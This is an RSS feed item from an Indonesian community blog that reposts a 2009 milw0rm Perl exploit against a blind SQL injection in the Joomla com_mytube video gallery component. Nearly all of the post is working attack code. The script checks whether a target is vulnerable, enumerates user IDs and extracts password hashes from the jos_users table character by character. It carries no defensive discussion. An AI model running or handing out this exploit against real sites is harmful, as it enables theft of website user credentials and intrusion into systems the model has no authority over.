<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Komunitas Pelajar Indonesia &#187; componen</title>
	<atom:link href="http://idpelajar.com/tag/componen/feed/" rel="self" type="application/rss+xml" />
	<link>http://idpelajar.com</link>
	<description></description>
	<lastBuildDate>Mon, 22 Feb 2010 03:57:16 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>komponent joomla com_mytube inject</title>
		<link>http://idpelajar.com/internet/komponent-joomla-com_mytube-inject/</link>
		<comments>http://idpelajar.com/internet/komponent-joomla-com_mytube-inject/#comments</comments>
		<pubDate>Fri, 30 Oct 2009 08:26:42 +0000</pubDate>
		<dc:creator>seen_think</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[componen]]></category>
		<category><![CDATA[component]]></category>
		<category><![CDATA[joomla]]></category>

		<guid isPermaLink="false">http://idpelajar.com/?p=137</guid>
		<description><![CDATA[#!/usr/bin/perl -w
#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;

#Author         : Chip D3 Bi0s
#Group          : LatiHackTeam
#Email          : chipdebios[alt+64]gmail.com
#Date           : 15 September 2009
#Critical Lvl   : Moderate
#Impact            : Exposure of sensitive information
#Where            : From Remote
#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;
#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Application   : MyRemote Video Gallery
#version       : 1.0 Beta
#Developer     : Jomtube Team
#License       : GPL            type  : Non-Commercial
#Date Added    : Aug 24, [...]]]></description>
			<content:encoded><![CDATA[<p>#!/usr/bin/perl -w</p>
<p>#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability<br />
#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
<span id="more-137"></span><br />
#Author         : Chip D3 Bi0s<br />
#Group          : LatiHackTeam<br />
#Email          : chipdebios[alt+64]gmail.com<br />
#Date           : 15 September 2009<br />
#Critical Lvl   : Moderate<br />
#Impact            : Exposure of sensitive information<br />
#Where            : From Remote<br />
#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>#Affected software description:<br />
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</p>
<p>#Application   : MyRemote Video Gallery<br />
#version       : 1.0 Beta<br />
#Developer     : Jomtube Team<br />
#License       : GPL            type  : Non-Commercial<br />
#Date Added    : Aug 24, 2009<br />
#Download      : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip<br />
#Description   :</p>
<p>#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x<br />
#which will allow you to transform your Website into a professional looking Video<br />
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery<br />
#is an open source (GNU GPL) video sharing Joomla extension has been created<br />
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.</p>
<p>#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers<br />
#the Framework so you can create your own Remote Plugins for other Remote Servers like<br />
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to<br />
#run your site for low cost since all the bandwidth usage and hard drive space is located<br />
#on the video server sites. So if you already have a large library of Videos on some<br />
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.</p>
<p>#&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>#I.Blind SQL injection (user_id)<br />
#Poc/Exploit:<br />
#~~~~~~~~~~~<br />
#http://127.0.0.1/[path]/index.php?view=videos&amp;type=member&amp;user_id=X[blind]&amp;option=com_mytube&amp;Itemid=null<br />
#X: Valid User_id</p>
<p>#+++++++++++++++++++++++++++++++++++++++<br />
#[!] Produced in South America<br />
#+++++++++++++++++++++++++++++++++++++++</p>
<p>use LWP::UserAgent;<br />
use Benchmark;<br />
my $t1 = new Benchmark;</p>
<p>system (&#8216;cls&#8217;);<br />
print &#8220;\n\n&#8221;;<br />
print &#8220;\t\t[+] &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;[+]\n&#8221;;<br />
print &#8220;\t\t|          |  Chip d3 Bi0s |          |\n&#8221;;<br />
print &#8220;\t\t|        MyRemote Video Gallery Bsql  | \n&#8221;;<br />
print &#8220;\t\t|joomla component com_mytube (user_id)| \n&#8221;;<br />
print &#8220;\t\t[+]&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-[+]\n\n&#8221;;</p>
<p>print &#8220;http://127.0.0.1/[path]/index.php?view=videos&amp;type=member&amp;user_id=62:\n&#8221;;chomp(my $target=&lt;STDIN&gt;);</p>
<p>$w=&#8221;Total Videos In Category&#8221;;<br />
$column_name=&#8221;concat(password)&#8221;;<br />
$table_name=&#8221;jos_users&#8221;;</p>
<p>$b = LWP::UserAgent-&gt;new() or die &#8220;Could not initialize browser\n&#8221;;<br />
$b-&gt;agent(&#8216;Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)&#8217;);</p>
<p>print &#8220;&#8212;&#8212;&#8212;&#8212;&#8212;-Inyectando&#8212;&#8212;&#8212;&#8212;&#8212;-\n&#8221;;</p>
<p>$host = $target . &#8220;+and+1=1&amp;option=com_mytube&amp;Itemid=null&#8221;;<br />
my $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));  my $content = $res-&gt;content;  my $regexp = $w;<br />
if ($content =~ /$regexp/) {</p>
<p>$host = $target . &#8220;+and+1=2&amp;option=com_mytube&amp;Itemid=null&#8221;;<br />
my $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));  my $content = $res-&gt;content;  my $regexp = $w;<br />
if ($content =~ /$regexp/) {print &#8221; [-] Exploit Fallo <img src='http://idpelajar.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> \n&#8221;;}</p>
<p>else</p>
<p>{print &#8221; [-] Vulnerable <img src='http://idpelajar.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> \n&#8221;;</p>
<p>$d=0;</p>
<p>for ($idusuario=62;$idusuario&lt;=80;$idusuario++)</p>
<p>{</p>
<p>$host = $target . &#8220;+and+ascii(substring((SELECT+&#8221;.$column_name.&#8221;+from+&#8221;.$table_name.&#8221;+where+id=&#8221;.$idusuario.&#8221;+limit+0,1),1,1))&gt;0&amp;option=com_mytube&amp;Itemid=null&#8221;;<br />
my $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));<br />
my $content = $res-&gt;content;<br />
my $regexp = $w;<br />
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}</p>
<p>}</p>
<p>print &#8221; [+] Usuario existentes : &#8220;.&#8221; &#8220;.join(&#8216;,&#8217;, @idusu) . &#8220;\n&#8221;;</p>
<p>print  &#8221; [-] # Usuario que desea extraer : &#8220;;chomp($iduss=&lt;STDIN&gt;);</p>
<p>for ($x=1;$x&lt;=32;$x++)<br />
{</p>
<p>$host = $target . &#8220;+and+ascii(substring((SELECT+&#8221;.$column_name.&#8221;+from+&#8221;.$table_name.&#8221;+where+id=&#8221;.$iduss.&#8221;+limit+0,1),&#8221;.$x.&#8221;,1))&gt;57&amp;option=com_mytube&amp;Itemid=null&#8221;;<br />
my $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));  my $content = $res-&gt;content;  my $regexp = $w;<br />
print &#8221; [!] &#8220;;if($x &lt;= 9 ) {print &#8220;0$x&#8221;;}else{print $x;}<br />
if ($content =~ /$regexp/)<br />
{</p>
<p>for ($c=97;$c&lt;=102;$c++)</p>
<p>{<br />
$host = $target . &#8220;+and+ascii(substring((SELECT+&#8221;.$column_name.&#8221;+from+&#8221;.$table_name.&#8221;+where+id=&#8221;.$iduss.&#8221;+limit+0,1),&#8221;.$x.&#8221;,1))=&#8221;.$c.&#8221;&amp;option=com_mytube&amp;Itemid=null&#8221;;<br />
my $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));<br />
my $content = $res-&gt;content;<br />
my $regexp = $w;</p>
<p>if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print &#8220;-Caracter: $char\n&#8221;; $c=102;}<br />
}</p>
<p>}<br />
else<br />
{</p>
<p>for ($c=48;$c&lt;=57;$c++)</p>
<p>{<br />
$host = $target . &#8220;+and+ascii(substring((SELECT+&#8221;.$column_name.&#8221;+from+&#8221;.$table_name.&#8221;+where+id=&#8221;.$iduss.&#8221;+limit+0,1),&#8221;.$x.&#8221;,1))=&#8221;.$c.&#8221;&amp;option=com_mytube&amp;Itemid=null&#8221;;<br />
my $res = $b-&gt;request(HTTP::Request-&gt;new(GET=&gt;$host));<br />
my $content = $res-&gt;content;<br />
my $regexp = $w;</p>
<p>if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print &#8220;-Caracter: $char\n&#8221;; $c=57;}<br />
}</p>
<p>}</p>
<p>}</p>
<p>print &#8221; [+] Password   :&#8221;.&#8221; &#8220;.join(&#8221;, @caracter) . &#8220;\n&#8221;;</p>
<p>my $t2 = new Benchmark;<br />
my $tt = timediff($t2, $t1);<br />
print &#8220;El script tomo:&#8221;,timestr($tt),&#8221;\n&#8221;;</p>
<p>}<br />
}</p>
<p>else</p>
<p>{print &#8221; [-] Exploit Fallo <img src='http://idpelajar.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> \n&#8221;;}</p>
<p># milw0rm.com [2009-09-21]</p>
<p>sumber : http://milw0rm.com/exploits/9733</p>
]]></content:encoded>
			<wfw:commentRss>http://idpelajar.com/internet/komponent-joomla-com_mytube-inject/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
